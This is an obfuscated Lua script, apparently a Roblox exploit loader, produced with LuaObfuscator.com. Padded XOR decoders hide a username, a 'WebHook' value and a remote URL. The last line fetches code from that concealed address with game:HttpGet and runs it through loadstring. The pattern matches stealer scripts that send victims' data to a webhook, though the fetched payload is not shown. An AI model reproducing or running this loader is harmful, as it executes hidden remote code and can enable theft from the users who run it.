--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v16,v17)local v20=0;local v21;local v22;local v23;while true do if (v20==(0 -0)) then v21=(0 + 0) -0;v22=nil;v20=1572 -(203 + 1368);end if (v20==(717 -(387 + 329))) then v23=nil;while true do if (v21==(0 + (195 -(31 + 164)))) then v22=0;v23=nil;v21=(1 -0) + 0 + 0;end if (v21==((351 -261) -(56 + (98 -65)))) then while true do local v28=0;while true do if (v28==(227 -(20 + 207))) then if (v22==((204 -(143 + 61)) -(0 -0))) then local v32=0 + 0;while true do if (v32==1) then v22=((12 -9) -(1 + 1)) + (0 -0);break;end if (v32==(1602 -(377 + 1225))) then v23={};for v33=(805 -(651 + 153)) + 0, #v16 do v6(v23,v0(v4(v1(v2(v16,v33,v33 + 1 + 0 + 0)),v1(v2(v17,1 + 0 + 0 + 0 + 0 + 0 + ((v33-((242 -(51 + 190)) + (0 -0)))% #v17),1 + 0 + ((v33-(((5 + 0) -3) -((1765 -(988 + 489)) -(280 + 7))))% #v17) + (((33 -25) -6) -((8 -4) -(726 -(171 + 552)))))))%((308 + 53 + (1951 -(1680 + 250))) -(161 -35))));end v32=1;end end end if (v22==((197 -(48 + 148)) -((1795 -(332 + 1463)) -(1590 -(1377 + 213))))) then return v5(v23);end break;end end end break;end end break;end end end local v8=string.char;local v9=string.byte;local v10=string.sub;local v11=bit32 or bit;local v12=v11.bxor;local v13=table.concat;local v14=table.insert;local function v15(v18,v19)local v24=0 -0;local v25;local v26;while true do if (v24==(1 + 0)) then while true do local v27=0;while true do if (0==v27) then if (((((2 + 3) -(1 + 0)) -((1329 -885) -((48 -29) + 188 + 236))) -((1891 -((9 -1) + (8894 -7012))) + 1 + 0))==v25) then return v13(v26);end if (v25==(((4352 -2632) -(580 + 497)) -((1932 -((2928 -(1097 + 785)) + (2076 -(422 + 984)))) + 427))) then local v29=0 + 0;local v30;local v31;while true do if (v29==1) then while true do if (v30==((2587 -(226 + 537)) -((745 -(167 + 365)) + (3303 -1692)))) then v31=(1113 -(267 + 608)) -((36 -21) + 109 + ((259 + 19) -(19 + 145)));while true do if (((4 -(4 -1)) -(0 -(0 + 0)))==v31) then v25=((5039 -2572) -((943 -308) + (2303 -1041))) -((2048 -(35 + 1210 + 618)) + (1170 -(655 + 131)));break;end if ((0 + 0)==v31) then local v34=0 + 0;local v35;while true do if ((0 + 0)==v34) then v35=(461 + 257) -(79 + 69 + (815 -245));while true do if (v35==(1 + 0 + 0 + 0)) then v31=796 -(110 + 97 + 588);break;end if (v35==(453 -((1368 -(323 + 780)) + 188))) then local v36=0;while true do if (v36==(4 -3)) then v35=(2 -1) + (0 -0);break;end if (v36==(0 -0)) then v26={};for i=((9 -6) + ((1013 -411) -(22 + 287 + 293))) -(3 -(1 + 0)), #v18 do v14(v26,v8(v12(v9(v10(v18,i,i + ((((2134 -1501) -381) + (((64 + 882) -((931 -(686 + 144)) + (371 -187))) -(278 -151))) -(21 + 77 + 16 + ((2776 -(1840 + 370)) -((1359 -(999 + 351)) + (741 -(651 + 87)) + 236 + 287)) + (265 -102) + 58 + 129 + ((3641 -2485) -(476 + 390)))))),v9(v10(v19,((((3886 -(1035 + 1163)) -(((1590 -(31 + 544)) -(1395 -672)) + ((508 + 670) -(221 + 276 + 39 + 7)))) -(((1222 + 1009) -((1745 -(5 + 10)) + 98)) + ((358 + 419) -((2458 -(155 + 411)) -(1547 -(71 + 70)))))) -(((933 -(279 + (1735 -(927 + 604)))) -(((71 -(23 + 18)) -((1305 -(1017 + 274)) + 2)) + ((319 + 1941) -(1473 + (928 -569))))) + (((7510 -4697) -((2074 -(272 + 1339)) + (2456 -1172))) -((583 -(563 -328)) + (1224 -(43 + 850)) + (771 -442))))) + (((5559 -4361) + (496 -117)) -(((673 -(679 -428)) -((3948 -1978) -((1859 -(28 + 1685)) + 926 + 588))) + (((193 -93) + 1415) -(12 + 2 + 8 + 4 + ((28 + 10) -(4 + 10)))))) + ((i-((((2269 -(167 + 1189)) -(467 + 445)) + ((0 -0) -(10 -(7 + (4 -1))))) -((275 -(56 + 219)) -((0 + 0) -(0 + 0)))))% #v19),((((3500 -(780 + 38)) -(1838 -606)) -(1038 + (488 -375) + ((274 + 1845) -((2303 -(6 + 659)) + (381 -(120 + 11)))) + ((464 -359) -40))) -(((3279 -(925 + 10)) -((3210 -(1005 + 784)) + 7)) -(((2230 -(452 + 229)) -((512 -297) + (2577 -(439 + 1159)))) + (1026 -((2913 -2159) + 70 + 42)) + ((885 + 442) -((1526 -887) + (425 -(91 + 45))))))) + ((i-((((2103 -(1594 + (1405 -1004))) + ((624 + 1226) -((2322 -(413 + 1296)) + (854 -355)))) -((1892 -((1301 -(74 + 364)) + (1935 -(186 + 852)))) + (((3793 -1135) -((974 -(37 + 271)) + 372)) -(938 -((1263 -(468 + 768)) + (6 -2)))))) -(((371 + 562 + (1691 -(284 + 1376))) -((730 -((1425 -(430 + 737)) + (1661 -(435 + 1176)))) + (1632 -(614 + 476)))) -(((2289 -(8 + 250)) -(483 + (291 -111))) -((526 -281) + 202 + 327 + ((395 + 936) -737))))))% #v19) + ((1 + (1047 -(650 + 136)) + 3) -((1239 -((2415 -(116 + 1412)) + (1073 -(31 + 853)))) + 23 + 13 + 15 + 7 + ((173 + 18) -(99 + 49)))))))%((((1799 + 1532) -(147 + 23 + 40 + 61)) -(798 + 76 + 313)) -((839 -449) + 195 + 667 + (((1970 -770) + (38 -14)) -(((23 + 8) -20) + ((3401 -(1056 + 630)) -867)))))));end v36=1;end end end end break;end end end end break;end end break;end if (v29==(0 + 0)) then v30=0 -0;v31=nil;v29=2 -1;end end end break;end end end break;end if (v24==0) then v25=(1420 -((1252 -(695 + 386)) + 814)) -(((985 -(315 + 355)) -(89 + 15 + (1894 -(591 + 1205)))) + ((344 + 284 + (318 -108)) -(((5882 -3937) -(372 + 7 + 1442)) + ((271 + 261) -(381 -241)))));v26=nil;v24=1;end end end UserName=v15(v7("\225\74\23\153\177\10\136\78\127\157\216\14\225\74\17\150\177\10\225\74\18\153\177\14\142\36\22\150","\189\120\35\175\237\59"),v7("\147\218\191\235\196\140\252\223\215\232\160\136\147\218\191\236\196\143\255\222\215\232\160\139\147\211\191\133\160\139","\207\235\139\217\152\190"));WebHook=v15(v7("\220\29\209\202\4\160\232\137\181\18\191\163\105\175\129\228\178\22\191\167\5\161\129\231\181\17\191\175\1\202\236\237\180\121\213\164\105\164\239\137\178\20\191\163\4\202\238\231\220\23\214\163\105\174\228\137\177\28\211\202\6\164\129\236\176\121\209\161\105\162\228\137\180\16\191\164\0\162\129\226\183\121\210\174\5\202\233\226\220\23\218\202\7\167\129\225\182\121\215\161\105\167\235\231\220\23\210\202\7\164\233\137\177\23\214\202\3\162\129\226\181\121\210\167\0\202\236\228\181\121\209\164\0\202\238\137\178\23\212\202\4\167\234\137\183\21\191\161\13\202\236\228\185\121\210\167\2\202\239\231\182\121\210\164\105\164\238\228\220\20\209\165\105\160\235\137\184\16\191\165\1\202\233\229\220\23\208\164\105\167\237\237\220\20\214\175\105\167\233\137\179\19\191\161\12\202\232\137\179\21\191\167\0\163\129\226\185\121\210\161\12\202\236\231\183\121\208\162\105\163\238\137\180\29\191\163\1\202\236\227\180\121\210\167\105\167\232\226\220\23\215\202\4\174\129\230\177\121\215\174\105\164\234\137\177\29\215\202\12\174\129\228\180\17\191\167\4\202\238\228\220\23\211\202\0\167\129\228\181\121\209\164\1\202\236\229\185\121\210\160\5\202\236\231\179\121\210\160\105\167\236\137\181\28\191\162\6\202\239\224\178\121\212\161\105\167\235\227\220\22\215\202\13\174\129\228\176\121\208\164\105\162\234\137\177\16\212\202\13\164\129\228\182\23\191\164\13\202\235\230\220\20\210\202\0\160\129\225\182\121\210\164\13\202\229\137\177\16\212\202\4\164\233\137\182\21\191\167\3\202\232\236\220\20\210\174\105\167\229\224\220\19\213","\128\37\227\150\53\150\221\213"),v7("\106\137\8\35\4\140\9\35\1\139\108\78\7\139\108\78\4\142\108\73\3\224\6\71\106\142\0\70","\54\188\48\127"));loadstring(game:HttpGet(v15(v7("\1\151\119\115\36\22\172\1\151\124\124\36\22\160\1\148\125\24\76\21\197\111\144\25\117\77\23\197\106\151\25\117\76\124\160\107\250\119\115\36\18\168\110\250\124\118\36\18\174\1\151\119\115\36\22\173\1\148\117\124\36\22\173\1\148\125\24\73\17\173\1\145\116\24\74\16\160\1\159\117\24\73\124\160\100\250\125\116\36\18\171\109\250\115\113\36\22\172\1\151\116\114\36\25\169\1\148\119\119\36\18\175\1\149\124\24\73\17\161\1\145\116\24\74\17\173\1\151\116\112\36\17\173\1\151\119\118\36\24\169\1\148\119\113\36\23\169\1\144\113\24\79\17\197\108\150\119\24\74\19\173\1\148\115\24\74\124\168\108\158\25\125\74\124\171\111\150\25\118\78\124\175\109\250\116\117\78\124\174\108\250\119\117\65\124\175\100\250\119\115\36\21\174\1\158\124\24\73\25\160\1\158\113","\93\166\69\68\120\32\153"),v7("\239\187\186\158\134\186\213\243\132\177\213\247\128\213\184\243\130","\179\137\137\194")),true))();
